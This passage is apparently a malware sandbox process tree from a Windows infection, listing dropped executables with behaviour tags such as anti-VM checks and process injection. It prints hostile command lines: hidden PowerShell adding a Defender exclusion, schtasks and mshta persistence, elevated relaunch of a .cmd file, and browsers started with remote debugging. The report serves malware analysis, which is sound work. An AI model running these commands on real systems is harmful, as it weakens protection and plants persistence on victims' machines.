                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4228
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5912
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 832
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:2348
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10115790101\T0QdO0l.exe"
                                                                                                                        4⤵
                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                        • Drops startup file
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:3256
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
                                                                                                                        4⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:460
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:5948
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                          5⤵
                                                                                                                          • Downloads MZ/PE file
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          PID:5652
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4672
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:4848
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:948
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5340
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5308
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5812
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4968
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 848
                                                                                                                              7⤵
                                                                                                                              • Program crash
                                                                                                                              PID:2608
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:6064
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5304
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3908
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12312.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:680
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 824
                                                                                                                              7⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5500
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:6112
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5380
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1136
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1684
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1880
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5244
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10017890101\fuck122112.exe"
                                                                                                                              7⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5212
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 840
                                                                                                                              7⤵
                                                                                                                              • Program crash
                                                                                                                              PID:420
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10019520101\pered.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10019520101\pered.exe"
                                                                                                                            6⤵
                                                                                                                              PID:5048
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10019600101\XMZTSVYE_l10_wix4_dash.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10019600101\XMZTSVYE_l10_wix4_dash.exe"
                                                                                                                              6⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4188
                                                                                                                              • C:\Windows\TEMP\{E962726F-BE8C-4F4A-B125-667D04587208}\.cr\XMZTSVYE_l10_wix4_dash.exe
                                                                                                                                "C:\Windows\TEMP\{E962726F-BE8C-4F4A-B125-667D04587208}\.cr\XMZTSVYE_l10_wix4_dash.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10019600101\XMZTSVYE_l10_wix4_dash.exe" -burn.filehandle.attached=684 -burn.filehandle.self=680
                                                                                                                                7⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2348
                                                                                                                                • C:\Windows\TEMP\{A445A949-63D0-4488-9B33-87A5C013B371}\.ba\Dashboard.exe
                                                                                                                                  C:\Windows\TEMP\{A445A949-63D0-4488-9B33-87A5C013B371}\.ba\Dashboard.exe
                                                                                                                                  8⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:3480
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\dqfPatch_beta\Dashboard.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\dqfPatch_beta\Dashboard.exe
                                                                                                                                    9⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:3008
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      10⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5668
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\PatchHost.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\PatchHost.exe
                                                                                                                                        11⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Modifies Control Panel
                                                                                                                                        PID:5724
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10019730101\9a53e8db73.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10019730101\9a53e8db73.exe"
                                                                                                                              6⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:756
                                                                                                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                7⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:5520
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10019740101\2d38ee2e5a.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10019740101\2d38ee2e5a.exe"
                                                                                                                              6⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:6116
                                                                                                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                7⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4932
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10122730101\bncn6rv.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10122730101\bncn6rv.exe"
                                                                                                                          4⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Downloads MZ/PE file
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:1692
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                            5⤵
                                                                                                                            • Uses browser remote debugging
                                                                                                                            PID:4612
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d4afcc40,0x7ff9d4afcc4c,0x7ff9d4afcc58
                                                                                                                              6⤵
                                                                                                                                PID:4984
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                              5⤵
                                                                                                                              • Uses browser remote debugging
                                                                                                                              • Enumerates system info in registry
                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                              PID:3592
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e6813cb8,0x7ff9e6813cc8,0x7ff9e6813cd8
                                                                                                                                6⤵
                                                                                                                                  PID:3820
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
                                                                                                                                  6⤵
                                                                                                                                    PID:4848
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:3
                                                                                                                                    6⤵
                                                                                                                                      PID:3808
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
                                                                                                                                      6⤵
                                                                                                                                        PID:5704
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                                                                                                                        6⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:4228
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
                                                                                                                                        6⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:3028
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2
                                                                                                                                        6⤵
                                                                                                                                          PID:3264
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2388 /prefetch:2
                                                                                                                                          6⤵
                                                                                                                                            PID:2436
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2064 /prefetch:2
                                                                                                                                            6⤵
                                                                                                                                              PID:2664
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4220 /prefetch:2
                                                                                                                                              6⤵
                                                                                                                                                PID:6028
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4932 /prefetch:2
                                                                                                                                                6⤵
                                                                                                                                                  PID:5584
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
                                                                                                                                                  6⤵
                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                  PID:1076
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1928,1589236979068704359,14150518278054315117,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
                                                                                                                                                  6⤵
                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                  PID:5748
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10123540101\packed.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10123540101\packed.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:6036
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:2840
                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f
                                                                                                                                                5⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:2756
                                                                                                                                              • C:\Program Files\runtime\COM Surrogate.exe
                                                                                                                                                "C:\Program Files\runtime\COM Surrogate.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Modifies system certificate store
                                                                                                                                                PID:5428
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10123850101\PQkVDtx.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10123850101\PQkVDtx.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:2112
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:5040
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd"
                                                                                                                                              4⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5696
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:1864
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10124111121\skf7iF4.cmd" sgcCUaUFtA
                                                                                                                                                  6⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3704
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:4744
                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                        "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                                                                                                                                        8⤵
                                                                                                                                                          PID:3476
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10124820101\yUI6F6C.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10124820101\yUI6F6C.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  PID:5940
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10124840101\CgmaT61.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10124840101\CgmaT61.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2708
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10125770101\8d538a588d.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10125770101\8d538a588d.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:5536
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c schtasks /create /tn X5h0GmaukKd /tr "mshta C:\Users\Admin\AppData\Local\Temp\frOuWs6uA.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:692
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
